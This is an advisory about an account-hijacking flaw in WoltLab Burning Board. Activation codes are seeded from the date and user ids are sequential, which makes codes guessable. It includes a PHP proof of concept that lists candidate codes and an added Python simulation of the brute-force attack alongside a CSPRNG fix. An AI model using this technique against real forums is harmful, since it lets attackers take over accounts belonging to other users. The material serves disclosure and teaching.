WoltLab Burning Board Hijacking
An authentication vulnerability was reported in the WoltLab Burning Board (wBB) web forum software. A remote user may be able to hijack a newly registered user account.

It is reported that wBB uses predictable temporary activation codes when it creates a new user account. If another user has requested a new account but has not yet activated the registration, that user's account may be hijacked.

To determine how many users exist on the forum, a remote user registers for a new account. The confirmation e-mail contains an activation URL of the following form:

http://forum.dom/forum/action.php?action=activation&userid=345&code=1563109322

User IDs are assigned sequentially, so in the above example any subsequent registrant will receive a userid of 346 or higher. The remote user therefore already knows the userid of the next new account and only has to guess its 'code'. According to the report, wBB seeds the code generator from the date, so the generator can produce only a limited number of codes (the report suggests on the order of 30 possible values). A remote user can thus feasibly brute-force the proper code for a newly assigned user account: one activation request per possible code.

A demonstration exploit that apparently generates all of the possible codes is provided (it enumerates 60 seeds):

```php
<?php
// Enumerate the activation codes reachable from the first 60 seeds.
for ($i = 0; $i < 60; $i++) {
    mt_srand($i);
    echo mt_rand() . "<BR>";
}
```

Solution: No solution was available at the time of this entry.
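The following is an added example (not wBB code and not part of the original report) that shows end to end why a date-seeded mt_rand() activation code is brute-forceable, and what the fix looks like. The MT19937 class reproduces the generator behind mt_srand()/mt_rand() in PHP 7.1 and later (the PHP 4-era builds this report concerns used a flawed Mersenne Twister variant, so the exact code values differ, but the tiny seed space is the same problem). The seed range 0..59 is taken from the demonstration exploit above; the Forum class, the per-registration seed values and the hardened token are constructed assumptions for the simulation.

```python
"""Added example: a date-seeded mt_rand() activation code versus a CSPRNG token.

Constructed simulation, not wBB code. MT19937 mirrors PHP >= 7.1 mt_srand()/mt_rand();
the Forum class, the seed values and strong_code_fn are assumptions for the demo.
"""
import hmac
import secrets
from typing import Callable, Iterator, Optional


class MT19937:
    """Reference MT19937 with init_genrand seeding (what PHP >= 7.1 mt_srand uses)."""
    N, M = 624, 397
    MATRIX_A, UPPER, LOWER = 0x9908B0DF, 0x80000000, 0x7FFFFFFF

    def __init__(self, seed: int) -> None:
        self.mt = [seed & 0xFFFFFFFF] + [0] * (self.N - 1)
        for i in range(1, self.N):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = self.N

    def _twist(self) -> None:
        for i in range(self.N):
            y = (self.mt[i] & self.UPPER) | (self.mt[(i + 1) % self.N] & self.LOWER)
            self.mt[i] = self.mt[(i + self.M) % self.N] ^ (y >> 1) ^ (self.MATRIX_A if y & 1 else 0)
        self.index = 0

    def genrand_int32(self) -> int:
        if self.index >= self.N:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF


def php_mt_rand(seed: int) -> int:
    """First mt_rand() after mt_srand(seed) in PHP >= 7.1: the 32-bit output shifted right by one."""
    return MT19937(seed).genrand_int32() >> 1


SEED_SPACE = 60  # the PoC on the page enumerates seeds 0..59


def candidate_codes(seed_space: int = SEED_SPACE) -> list:
    """Attacker side: every code the generator can emit, one per possible seed."""
    return [php_mt_rand(s) for s in range(seed_space)]


class Forum:
    """Constructed stand-in for action.php?action=activation; not the real wBB endpoint."""

    def __init__(self, code_fn: Callable[[], object], first_user_id: int = 345) -> None:
        self.code_fn = code_fn
        self.next_user_id = first_user_id
        self.pending = {}  # userid -> activation code awaiting confirmation

    def register(self, username: str):
        """Creates the account and returns what the confirmation e-mail would carry."""
        user_id, code = self.next_user_id, self.code_fn()
        self.next_user_id += 1  # sequential ids: the next registrant's id is predictable
        self.pending[user_id] = code
        return user_id, code

    def activate(self, user_id: int, code) -> bool:
        stored = self.pending.get(user_id)
        if stored is None or not hmac.compare_digest(str(stored), str(code)):
            return False
        del self.pending[user_id]
        return True


def weak_code_fn(seeds: Iterator[int]) -> Callable[[], int]:
    """Vulnerable pattern (assumed): mt_srand() with a small date-derived integer, then one mt_rand()."""
    return lambda: php_mt_rand(next(seeds))


def strong_code_fn() -> str:
    """Fix: a 128-bit token from the OS CSPRNG; there is no seed to enumerate."""
    return secrets.token_hex(16)


def run_attack(forum: Forum, seed_space: int = SEED_SPACE) -> Optional[tuple]:
    """Register to learn the id counter, then brute-force the next account's code."""
    my_id, _ = forum.register("attacker")  # e-mail: ...&userid=345&code=...
    victim_id = my_id + 1                  # whoever registers next gets this id
    forum.register("victim")               # the attacker never sees this e-mail
    for attempts, code in enumerate(candidate_codes(seed_space), start=1):
        if forum.activate(victim_id, code):
            return victim_id, code, attempts
    return None


if __name__ == "__main__":
    # Seeds 3 and 17 stand in for whatever the server derives from the date at each registration.
    hit = run_attack(Forum(weak_code_fn(iter([3, 17]))))
    print("weak generator:", hit)                          # (346, <code>, 18): hijacked within 18 requests
    print("CSPRNG token:", run_attack(Forum(strong_code_fn)))  # None: all 60 guesses fail
```

The attacker's own confirmation e-mail is itself a useful check: if the code it carries appears in candidate_codes(), the generator is the weak one and the next account is worth attacking. The fix needs no change to the activation URL format, only to where the code comes from.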